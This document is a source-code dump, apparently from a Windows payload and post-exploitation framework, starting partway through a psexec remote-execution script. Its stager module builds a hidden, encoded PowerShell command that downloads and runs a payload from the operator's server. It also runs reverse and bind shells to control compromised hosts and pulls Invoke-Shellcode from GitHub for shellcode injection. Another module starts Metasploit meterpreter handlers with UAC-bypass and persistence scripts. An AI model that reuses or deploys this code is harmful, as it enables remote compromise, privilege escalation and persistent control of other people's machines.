len(sys.argv)==1: 426 | parser.print_help() 427 | sys.exit(1) 428 | 429 | options = parser.parse_args() 430 | 431 | if options.debug is True: 432 | logging.getLogger().setLevel(logging.DEBUG) 433 | else: 434 | logging.getLogger().setLevel(logging.INFO) 435 | 436 | import re 437 | domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('') 438 | 439 | #In case the password contains '@' 440 | if '@' in address: 441 | password = password + '@' + address.rpartition('@')[0] 442 | address = address.rpartition('@')[2] 443 | 444 | if domain is None: 445 | domain = '' 446 | 447 | if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None: 448 | from getpass import getpass 449 | password = getpass("Password:") 450 | 451 | if options.aesKey is not None: 452 | options.k = True 453 | 454 | command = ' '.join(options.command) 455 | if command == ' ': 456 | command = 'cmd.exe' 457 | 458 | executer = PSEXEC(command, options.path, options.file, options.c, None, username, password, domain, options.hashes, options.aesKey, options.k) 459 | executer.run(address) 460 | -------------------------------------------------------------------------------- /lib/stager.py: -------------------------------------------------------------------------------- 1 | from __future__ import unicode_literals 2 | from main import * 3 | from menu import * 4 | from prompt_toolkit.contrib.completers import WordCompleter 5 | 6 | history = prompt_toolkit.history.InMemoryHistory() 7 | 8 | serverlist = [] 9 | 10 | def printListener(): 11 | from listener import Server 12 | while True: 13 | bindOrReverse = raw_input(t.bold_green + '[?] (b)ind/[r]everse: ' + t.normal).lower() 14 | if bindOrReverse == 'b' or bindOrReverse == 'r': 15 | break 16 | if bindOrReverse == 'r': 17 | powershellContent = open('lib/powershell/stager.ps1', 'r').read() 18 | windows_powershell_stager = powershellContent % ('False', FUNCTIONS().CheckInternet(), '5555') 19 | else: 20 | powershellContent = open('lib/powershell/stager.ps1', 'r').read() 21 | windows_powershell_stager = powershellContent % ('True', '', '5556') 22 | 23 | powershellFileName = 'p.ps1' 24 | with open((payloaddir()+ '/' + powershellFileName), 'w') as powershellStagerFile: 25 | powershellStagerFile.write(windows_powershell_stager) 26 | powershellStagerFile.close() 27 | randoStagerDLPort = random.randint(5000,9000) 28 | FUNCTIONS().DoServe(FUNCTIONS().CheckInternet(), powershellFileName, payloaddir(), port=randoStagerDLPort, printIt = False) 29 | print 'powershell -w hidden -noni -enc ' + ("IEX (New-Object Net.Webclient).DownloadString('http://" + FUNCTIONS().CheckInternet() + ":" + str(randoStagerDLPort) + "/" + powershellFileName + "')").encode('utf_16_le').encode('base64').replace('\n','') 30 | 31 | if bindOrReverse == 'b': 32 | if not '5556' in str(serverlist): 33 | ipADDR = raw_input(t.bold_green + '[?] IP After Run Bind Shell on Target: ' + t.normal) 34 | connectserver = Server(ipADDR, 5556, bindsocket=False) 35 | serverlist.append(connectserver) 36 | else: 37 | if not '5555' in str(serverlist): 38 | listenerserver = Server('0.0.0.0', 5555, bindsocket=True) 39 | serverlist.append(listenerserver) 40 | return "pass" 41 | 42 | 43 | def interactShell(clientnumber): 44 | clientnumber = int(clientnumber) 45 | from menu import clientMenuOptions 46 | for server in serverlist: 47 | if clientnumber in server.handlers.keys(): 48 | print "Commands\n" + "-"*50 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*50 49 | while True: 50 | if server.handlers[clientnumber].in_buffer: 51 | print server.handlers[clientnumber].in_buffer.pop() 52 | command = prompt_toolkit.prompt("PS >", completer=WordCompleter(['back', 'exit']), history=history) 53 | if command.lower() == "back": 54 | break 55 | if command.lower() == "exit": 56 | server.handlers[clientnumber].handle_close() 57 | del clientMenuOptions[str(clientnumber)] 58 | time.sleep(2) 59 | break 60 | if command == "": 61 | server.handlers[clientnumber].out_buffer.append('{"type":"", "data":"", "sendoutput":""}') 62 | else: 63 | json = '{"type":"exec", "data":"%s", "sendoutput":"true"}'% ((base64.b64encode(command.encode('utf_16_le')))) 64 | server.handlers[clientnumber].out_buffer.append(json) 65 | while not server.handlers[clientnumber].in_buffer: 66 | time.sleep(0.01) 67 | print server.handlers[clientnumber].in_buffer.pop() 68 | 69 | 70 | return "clear" 71 | 72 | def returnServerList(): 73 | return serverlist 74 | 75 | def clientUpload(fileToUpload,clientnumber,powershellExec,isExe): 76 | from menu import clientMenuOptions 77 | clientnumber = int(clientnumber) 78 | 79 | if isExe: 80 | newpayloadlayout = FUNCTIONS().powershellShellcodeLayout(powershellExec) 81 | encPowershell = "IEX(New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/raw/master/CodeExecution/Invoke-Shellcode.ps1');Start-Sleep 30;Invoke-Shellcode -Force -Shellcode @(%s)"%newpayloadlayout.rstrip(',') 82 | encPowershell = base64.b64encode(encPowershell.encode('UTF-16LE')) 83 | fullExec = "$Arch = (Get-Process -Id $PID).StartInfo.EnvironmentVariables['PROCESSOR_ARCHITECTURE'];if($Arch -eq 'x86'){powershell -exec bypass -enc \"%s\"}elseif($Arch -eq 'amd64'){$powershell86 = $env:windir + '\SysWOW64\WindowsPowerShell\\v1.0\powershell.exe';& $powershell86 -exec bypass -enc \"%s\"}"%(encPowershell,encPowershell) 84 | b64Exec = base64.b64encode(fullExec.encode('UTF-16LE')) 85 | lenb64 = len(b64Exec) 86 | 87 | maxlen = 10000 88 | if lenb64 > maxlen: 89 | current_length = 0 90 | numberOfPackets = int(lenb64 / maxlen) 91 | if lenb64 % maxlen != 0: 92 | numberOfPackets += 1 93 | print "number of staged packets: " + str(numberOfPackets) 94 | 95 | while current_length < lenb64: 96 | cutlength = maxlen 97 | if lenb64 < current_length + maxlen: 98 | cutlength = lenb64 - current_length 99 | 100 | tmp_str = b64Exec[current_length:current_length + cutlength] 101 | current_length += maxlen 102 | time.sleep(0.5) 103 | for server in serverlist: 104 | if clientnumber in server.handlers.keys(): 105 | server.handlers[clientnumber].out_buffer.append('{"type":"", "data":"%s", "sendoutput":"false", "multiple":"true"}'% (tmp_str)) 106 | print "sending exec packet!" 107 | time.sleep(0.5) 108 | for server in serverlist: 109 | if clientnumber in server.handlers.keys(): 110 | server.handlers[clientnumber].out_buffer.append('{"type":"", "data":"", "sendoutput":"false", "multiple":"exec"}') 111 | 112 | else: 113 | powershellExec = '{"type":"", "data":"%s", "sendoutput":"false", "multiple":""}'% (base64.b64encode(fullExec.encode('utf_16_le'))) 114 | else: 115 | for server in serverlist: 116 | if clientnumber in server.handlers.keys(): 117 | server.handlers[clientnumber].out_buffer.append(powershellExec) 118 | return clientnumber 119 | -------------------------------------------------------------------------------- /lib/startmetasploit.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | class METASPLOIT(object): 4 | def __init__(self): 5 | if os.geteuid == 0: 6 | self.placeholder = '' 7 | else: 8 | self.placeholder = 'sudo ' 9 | 10 | ########Reverse######## 11 | def metrev_uac(self,portnum): 12 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum)) 13 | def metrev_allchecks(self,portnum): 14 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum)) 15 | def metrev_persistence(self,portnum): 16 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum)) 17 | def metrev_normal(self,portnum): 18 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT %s;set LHOST 0.0.0.0;set ExitOnSession false; exploit -j\'' %(self.placeholder, portnum)) 19 | ########Bind######## 20 | def metbind_uac(self,bindport,bindip): 21 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, bindport, bindip)) 22 | def metbind_allchecks(self,bindport,bindip): 23 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' % (self.placeholder, bindport, bindip)) 24 | def metbind_persistence(self,bindport,bindip): 25 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, bindport, bindip)) 26 | def metbind_normal(self,bindport,bindip): 27 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/bind_tcp;set LPORT %s;set RHOST %s;set ExitOnSession false; exploit -j \'' % (self.placeholder, bindport, bindip)) 28 | ########Http######## 29 | def methttps_uac(self,portnum): 30 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, portnum)) 31 | def methttps_allchecks(self,portnum): 32 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' % (self.placeholder, portnum)) 33 | def methttps_persistence(self,portnum): 34 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false;exploit -j\'' % (self.placeholder, portnum)) 35 | def methttps_normal(self,portnum): 36 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LPORT %s;set LHOST 0.0.0.0;set ExitOnSession false; exploit -j\'' % (self.placeholder, portnum)) 37 | ########DNS######## 38 | def metdns_uac(self,portnum,DNSaddr): 39 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set autorunscript multi_console_command -rc uacbypass.rc;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum,DNSaddr)) 40 | def metdns_allchecks(self,portnum,DNSaddr): 41 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set autorunscript post/windows/manage/exec_powershell SCRIPT=allchecks.ps1;set ExitOnSession false;exploit -j\'' %(self.placeholder, portnum,DNSaddr)) 42 | def metdns_persistence(self,portnum,DNSaddr): 43 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set autorunscript multi_console_command -rc persist.rc;set ExitOnSession false; exploit -j\'' %(self.placeholder, portnum,DNSaddr)) 44 | def metdns_normal(self,portnum,DNSaddr): 45 | os.system('%smsfconsole -x \'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp_dns;set LPORT %s;set LHOST %s;set ExitOnSession false; exploit -j\'' %(self.placeholder, portnum,DNSaddr)) 46 | ########NC####### 47 | def nclisterner(self,portnum): 48 | os.system('%snc -lvp %s'%(self.placeholder, portnum)) 49 | -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ######## 3 | winpayloadsdir=$(pwd) 4 | 5 | reinstall=0 6 | for i in "$@" 7 | do 8 | case $i in 9 | -r) 10 | reinstall=1 11 | shift 12 | ;; 13 | esac 14 | done 15 | ######## 16 | 17 | 18 | echo -e '\033[1;32m[*] Installing Dependencies \033[0m' 19 | sudo dpkg --add-architecture i386 20 | sudo apt-get update 21 | sudo apt-get -y install winbind unzip wget git python2.7 python python-crypto python-pefile python-pip 22 | 23 | echo -e '\033[1;32m[*] Installing Wine \033[0m' 24 | sudo apt-get -y install wine32 25 | sudo apt-get -y install wine 26 | 27 | echo -e '\033[1;32m[*] Installing Python Requirements \033[0m' 28 | sudo pip install blessed 29 | sudo pip install pyasn1 30 | sudo pip install --upgrade --force-reinstall prompt_toolkit 31 | 32 | echo -e '\033[1;32m[*] Downloading Python27, Pywin32 and Pycrypto For Wine \033[0m' 33 | if [[ ! -d "~/.wine/drive_c/Python27/" || $reinstall -eq 1 ]]; then 34 | wget https://www.python.org/ftp/python/2.7.10/python-2.7.10.msi 35 | wine msiexec /i python-2.7.10.msi TARGETDIR=C:\Python27 ALLUSERS=1 /q 36 | wget http://www.voidspace.org.uk/downloads/pycrypto26/pycrypto-2.6.win32-py2.7.exe 37 | unzip pycrypto-2.6.win32-py2.7.exe 38 | wget https://download.microsoft.com/download/1/1/1/1116b75a-9ec3-481a-a3c8-1777b5381140/vcredist_x86.exe 39 | wine vcredist_x86.exe /qb! 40 | wget https://sourceforge.net/projects/pywin32/files/pywin32/Build%20220/pywin32-220.win32-py2.7.exe/download 41 | mv download pywin32.exe 42 | unzip pywin32.exe 43 | cp -rf PLATLIB/* ~/.wine/drive_c/Python27/Lib/site-packages/ 44 | cp -rf SCRIPTS/* ~/.wine/drive_c/Python27/Lib/site-packages/ 45 | cp -rf SCRIPTS/* ~/.wine/drive_c/Python27/Scripts/ 46 | wine ~/.wine/drive_c/Python27/python.exe ~/.wine/drive_c/Python27/Scripts/pywin32_postinstall.py -install -silent 47 | else 48 | echo -e '\033[1;32m[*] Installed Already, Skipping! \033[0m' 49 | fi 50 | 51 | echo -e '\033[1;32m[*] Installing Pyinstaller \033[0m' 52 | if [[ ! -d "/opt/pyinstaller" || $reinstall -eq 1 ]]; then 53 | if [ -d "/opt/pyinstaller/.git" ]; then 54 | rm /opt/pyinstaller -rf 55 | fi 56 | curl -O -L https://github.com/pyinstaller/pyinstaller/releases/download/v3.2.1/PyInstaller-3.2.1.zip 57 | unzip PyInstaller-3.2.1.zip -d /opt 58 | mv /opt/PyInstaller-3.2.1 /opt/pyinstaller 59 | cd /opt/pyinstaller 60 | wine ~/.wine/drive_c/Python27/python.exe setup.py install 61 | cd $winpayloadsdir 62 | 63 | else 64 | echo -e '\033[1;32m[*] Installed Already, Skipping! \033[0m' 65 | fi 66 | 67 | 68 | echo -e '\033[1;32m[*] Installing impacket from Git \033[0m' 69 | if [[ ! -d "/usr/local/lib/python2.7/dist-packages/impacket" || $reinstall -eq 1 ]]; then 70 | git clone https://github.com/CoreSecurity/impacket.git 71 | cd impacket 72 | python2.7 setup.py install 73 | cd .. 74 | else 75 | echo -e '\033[1;32m[*] Installed Already, Skipping! \033[0m' 76 | fi 77 | 78 | echo -e '\033[1;32m[*] Grabbing Wine Modules \033[0m' 79 | wine ~/.wine/drive_c/Python27/Scripts/pip.exe install pefile 80 | wine ~/.wine/drive_c/Python27/Scripts/pip.exe install dis3 81 | echo -e '\033[1;32m[*] Done \033[0m' 82 | 83 | 84 | echo -e '\033[1;32m[*] Grabbing Modules \033[0m' 85 | cd lib 86 | rm psexecspray.py 87 | curl -O https://raw.githubusercontent.com/Charliedean/PsexecSpray/master/psexecspray.py 88 | cd .. 89 | echo -e '\033[1;32m[*] Done \033[0m' 90 | 91 | echo -e '\033[1;32m[*] Grabbing Certs \033[0m' 92 | openssl genrsa -out server.pass.key 2048 93 | openssl rsa -in server.pass.key -out server.key 94 | openssl req -new -key server.key -out server.csr -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" 95 | openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt 96 | rm server.csr server.pass.key 97 | echo -e '\033[1;32m[*] Done \033[0m' 98 | 99 | 100 | echo -e '\033[1;32m[*] Cleaning Up \033[0m' 101 | rm python-2.7.10.msi PyInstaller-3.2.1.zip pycrypto-2.6.win32-py2.7.exe vcredist_x86.exe pywin32.exe PLATLIB SCRIPTS impacket -rf 102 | echo -e '\033[1;32m[*] Done \033[0m' 103 | --------------------------------------------------------------------------------